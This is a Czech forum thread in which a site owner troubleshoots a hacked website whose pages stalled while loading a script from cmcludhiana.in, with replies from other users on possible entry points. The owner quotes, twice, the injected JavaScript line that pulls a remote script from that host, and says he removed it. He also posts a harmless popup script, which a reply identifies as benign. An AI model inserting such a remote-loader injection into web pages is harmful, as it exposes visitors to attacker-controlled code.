Autor Zpráva
msigmund
Profil
Dobrý den, prosím o radu, kde je problém?

Co se stalo:
Včera asi tři hodiny se mi web načítal přes 1minutu v prohlížeči a na liště dole to psalo "Připojuji se na cmcludhiana.in...".
Odstranil jsem z webu vše co směřovalo ven a scripty, prostě zůstal jen čistý text načtený z db a menu s interními odkazy, php jsem zkontroloval jestli tam není vir či cokoli co tam nemá co dělat.
Nic se nezměnilo, stále načítání stránek přes jednu minutu a dole to stále psalo "Připojuji se na cmcludhiana.in...". Podotýkám, že jsem na stránce neměl nic než text.

Psal jsem to samé jako zde, poskytovateli hostingu a jeho odpověď mě zarazila.
"lituji, že se Vám aplikace pomalu načítá, ale nemůžeme být odpovědni za obsah, který načítáte či importujete z jiných webů, které nejsou vedeny u nás."

Kde se stala chyba?
tiso
Profil
msigmund: Prolém s vírusom si už na stránke mal, takže si asi nehľadal poriadne.
Davex
Profil
msigmund:
Třeba máš špatně ošetřené vkládání souborů pomocí include() a ten šmejd se tam tudy dostává nebo si ve skriptech přehlédl nějaká zadní vrátka.
msigmund
Profil
Prošel jsem to vše, ale nekoukal jsem do JS a koukám, že tam opravdu byl šmejd:
document.write('<script src=http://cmcludhiana.in/event_image/cmc_ludhiana_hospital.php ><\/script>');

Odstranil jsem to, změnil heslo na FTP a načítaní je rychlé, ale stačí to?

Jak se tam proboha dostal! V PC ani prohlížeči nemám uložena hesla, někde jo ale jsou jiná (fiktivní).

Myslíte, že to má souvislost s nedávným nabouráním do Banánu, tam mám hostuji.

Děkuji za reakce.
vynalezce
Profil
msigmund:
Staci to?
Zkontroluj, jestli nekde nemas nejaky php kod, ktery tam byt nema
je to mozne (souvislost s hackem bananu)
Davex
Profil
msigmund:
Kromě zneužití FTP přístupu se tam mohl dostat mezerou v zabezpečení webové aplikace.

vynalezce:
Proč by měl mít hack hostingu z letošního ledna něco společného s nežádoucím kódem na webu od loňského října (viz [#2])? Kdyby to souviselo s lednovým incidentem, tak by byla nákaza mnohem masivnější napříč všemi weby u stejného hostingu.
vynalezce
Profil
Davex:
co, ze? On ten link nevede na nase faq? Toho jsem si nevsiml. Za dezinformaci se omlouvam.
msigmund
Profil
Už to mám. Dlouho jsem pátral až jsem ho našel.
A dokonce jsem si ho tam já bl... nahrál sám, když jsem pro známého stáhl css templates na e-shop "electronix" a nahrál na ftp, aby si ho stáhl. V jednom souboru bylo:
<script>
PositionX = 100;
PositionY = 100;


defaultWidth  = 500;
defaultHeight = 500;
var AutoClose = true;

if (parseInt(navigator.appVersion.charAt(0))>=4){
var isNN=(navigator.appName=="Netscape")?1:0;
var isIE=(navigator.appName.indexOf("Microsoft")!=-1)?1:0;}
var optNN='scrollbars=no,width='+defaultWidth+',height='+defaultHeight+',left='+PositionX+',top='+PositionY;
var optIE='scrollbars=no,width=150,height=100,left='+PositionX+',top='+PositionY;
function popImage(imageURL,imageTitle){
if (isNN){imgWin=window.open('about:blank','',optNN);}
if (isIE){imgWin=window.open('about:blank','',optIE);}
with (imgWin.document){
writeln('<html><head><title>Loading...</title><style>body{margin:0px;}</style>');writeln('<sc'+'ript>');
writeln('var isNN,isIE;');writeln('if (parseInt(navigator.appVersion.charAt(0))>=4){');
writeln('isNN=(navigator.appName=="Netscape")?1:0;');writeln('isIE=(navigator.appName.indexOf("Microsoft")!=-1)?1:0;}');
writeln('function reSizeToImage(){');writeln('if (isIE){');writeln('window.resizeTo(300,300);');
writeln('width=300-(document.body.clientWidth-document.images[0].width);');
writeln('height=300-(document.body.clientHeight-document.images[0].height);');
writeln('window.resizeTo(width,height);}');writeln('if (isNN){');       
writeln('window.innerWidth=document.images["George"].width;');writeln('window.innerHeight=document.images["George"].height;}}');
writeln('function doTitle(){document.title="'+imageTitle+'";}');writeln('</sc'+'ript>');
if (!AutoClose) writeln('</head><body bgcolor=ffffff scroll="no" onload="reSizeToImage();doTitle();self.focus()">')
else writeln('</head><body bgcolor=ffffff scroll="no" onload="reSizeToImage();doTitle();self.focus()" onblur="self.close()">');
writeln('<img name="George" src='+imageURL+' style="display:block"></body></html>');
close();		
}}

</script>


Je to ono,že jo? Co to dělá?

Za dobrotu na žebrotu, měl jsem si zkontrolovat co tam nahrávám.
Davex
Profil
msigmund:
Není to ono. Toto je Javascript a pomocí něho se nedá modifikovat zdrojový kód PHP skriptů na hostingu.

Co to dělá?
Je tam definována funkce, pomocí které se zobrazují obrázky ve vyskakovacím okně.
msigmund
Profil
vynalezce:
Zkontroluj, jestli nekde nemas nejaky php kod, ktery tam byt nema
Tak jsem nenašel nic jiného než:

document.write('<script src=http://cmcludhiana.in/event_image/cmc_ludhiana_hospital.php ><\/script>');


include() mám ošetřené, to jsem kontroloval, tak tedy nevím jak se to tam dostalo.
Jak to mohlo infikovat jak doménu tak i subdomény, nechápu.

Jinak všem děkuji.

0